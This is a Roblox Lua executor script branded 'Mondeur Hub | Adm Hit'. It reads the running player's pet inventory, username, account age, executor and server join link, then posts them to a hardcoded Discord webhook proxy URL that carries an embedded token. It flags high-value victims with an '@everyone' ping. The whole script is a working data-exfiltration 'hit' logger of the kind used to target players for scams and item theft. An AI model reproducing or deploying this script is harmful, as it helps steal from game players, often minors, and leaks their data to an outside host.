--// MONDEUR HUB | ADM HIT 🦊 (REAL INVENTORY VERSION)

local HttpService = game:GetService("HttpService")
local ClientData = require(game:GetService("ReplicatedStorage"):WaitForChild("ClientModules"):WaitForChild("Core"):WaitForChild("ClientData"))

-- =========================
-- 🔥 HARDCODED WEBHOOK
-- =========================
local WEBHOOK = "https://webhook.lewisakura.moe/api/webhooks/1408047737102012506/4VZHtB_G9RmikEuLs0-A6yP_0AXaYmb4_4Y3TyaG_0Wxem1-OvNBtPC9n71B4-SSzkUa"

-- 🎯 SMART THRESHOLD SYSTEM
local LOW_THRESHOLD = 300
local HIGH_THRESHOLD = 1500

-- =========================
-- 🌐 REQUEST DETECTION (DELTA PROXY STYLE)
-- =========================
local requestFunc = (syn and syn.request) or (http and http.request) or http_request or request

if not requestFunc then
    warn("❌ No request function")
    return
end

-- =========================
-- 🧠 NORMALIZE NAME
-- =========================
local function normalize(str)
    str = tostring(str or ""):lower()
    str = str:gsub("_"," ")
    str = str:gsub("[^%w%s]","")
    str = str:gsub("%s+"," ")
    return str
end

-- =========================
-- 🎨 COLORS
-- =========================
local rarityColors = {
    legendary = 0xFFD700,
    ultra_rare = 0xA020F0,
    rare = 0x1E90FF,
    uncommon = 0x32CD32,
    common = 0xB0B0B0
}

-- =========================
-- 🏷️ EMOJIS (Using your preferred mapping)
-- =========================
local function getPetEmoji(name, p)
    local e = ""
    if name:find("red fox") then e = "🧑‍🌾 " 
    elseif name:find("disco bee") then e = "🪩 "
    elseif name:find("queen bee") then e = "🐝 " 
    end

    if p.mega then e = e .. "🌈 " elseif p.neon then e = e .. "🟣 " end
    if p.fly then e = e .. "🪽 " end
    if p.ride then e = e .. "🏇 " end
    
    if e == "" then e = "🐾 " end
    return e
end

-- =========================
-- 📦 PROCESS PETS (PERFECT STRUCTURE)
-- =========================
local function process(pets)
    local map, total = {}, 0

    for unique_id, pet_data in pairs(pets or {}) do
        if pet_data and pet_data.id then
            local rawName = tostring(pet_data.id):gsub("_", " ")
            local key = normalize(rawName)

            if not map[key] then
                map[key] = {
                    name = rawName:sub(1,1):upper() .. rawName:sub(2),
                    count = 0,
                    value = 0,
                    rarity = (pet_data.rarity or "common"):lower(),
                    neon = pet_data.neon,
                    mega = pet_data.mega,
                    fly = pet_data.flyable,
                    ride = pet_data.rideable
                }
            end

            map[key].count += 1
            total += 10 
        end
    end

    local list = {}
    for _, v in pairs(map) do 
        table.insert(list, v) 
    end
    
    -- Sort by count DESC (most common first = "best")
    table.sort(list, function(a,b) 
        return a.count > b.count 
    end)

    return list, total
end

-- =========================
-- 📋 FORMAT (CLEAN LISTING)
-- =========================
local function format(list)
    local t = {}
    for i, p in ipairs(list) do
        if i > 12 then break end
        table.insert(t, string.format("%s%s x%d", getPetEmoji(p.name:lower(), p), p.name, p.count))
    end
    return (#t > 0 and table.concat(t,"\n") or "No pets")
end

-- =========================
-- 📊 TIER
-- =========================
local function getTier(v)
    if v >= HIGH_THRESHOLD then return "🔴 HIGH" end
    if v >= LOW_THRESHOLD then return "🟡 MID" end
    return "🟢 LOW"
end

-- =========================
-- 🚀 RUN (DELTA PROXY STYLE)
-- =========================
local function Run(data)
    local list, total = process(data.pets)
    local best = list[1] and (list[1].name.." x"..list[1].count) or "None"
    local petList = format(list)
    local tier = getTier(total)

    local content = (tier == "🔴 HIGH") and "@everyone" or ""
    local color = rarityColors[list[1] and list[1].rarity or "common"] or 0x2F3136

    local embed = {
        title = "🦊 Mondeur Hub | Adm Hit",
        description = "```" ..
            "👤 Display Name : "..data.player.displayName.."\n"..
            "🆔 Username     : "..data.player.username.."\n"..
            "📅 Account Age  : "..data.player.accountAge.." days\n"..
            "📱 Executor     : "..data.player.executor.."\n"..
            "👥 Players      : "..data.player.players.."\n"..
            "💰 Total Value  : "..total.."\n"..
            "📊 Tier         : "..tier.."```",
        fields = {
            {name="🏆 Best Pet", value="```"..best.."```"},
            {name="🐶 Pets (Best → Worst)", value="```"..petList.."```"},
            {name="🌐 Join Server", value="[Click to Join]("..data.joinLink..")"}
        },
        color = color,
        footer = {text = "Mondeuronbotton"}
    }

    -- DELTA PROXY STYLE REQUEST (More reliable)
    local success, response = pcall(function()
        return requestFunc({
            Url = WEBHOOK,
            Method = "POST",
            Headers = { ["Content-Type"] = "application/json" },
            Body = HttpService:JSONEncode({content = content, embeds = {embed}})
        })
    end)

    if success then
        print("✅ Webhook Sent Successfully!")
    else
        warn("❌ Webhook Error: " .. tostring(response))
    end
end

-- =========================
-- 🛠️ FETCH REAL PETS (EXACT STRUCTURE)
-- =========================
local inventory = ClientData.get("inventory")
local pets = inventory and inventory.pets or {}

Run({
    player = {
        displayName = game.Players.LocalPlayer.DisplayName,
        username = game.Players.LocalPlayer.Name,
        accountAge = game.Players.LocalPlayer.AccountAge,
        executor = (identifyexecutor and identifyexecutor()) or "Unknown",
        players = #game.Players:GetPlayers().."/"..game.Players.MaxPlayers
    },
    joinLink = "https://www.roblox.com/games/start?placeId=" .. tostring(game.PlaceId) .. "&instanceId=" .. tostring(game.JobId),
    pets = pets
})
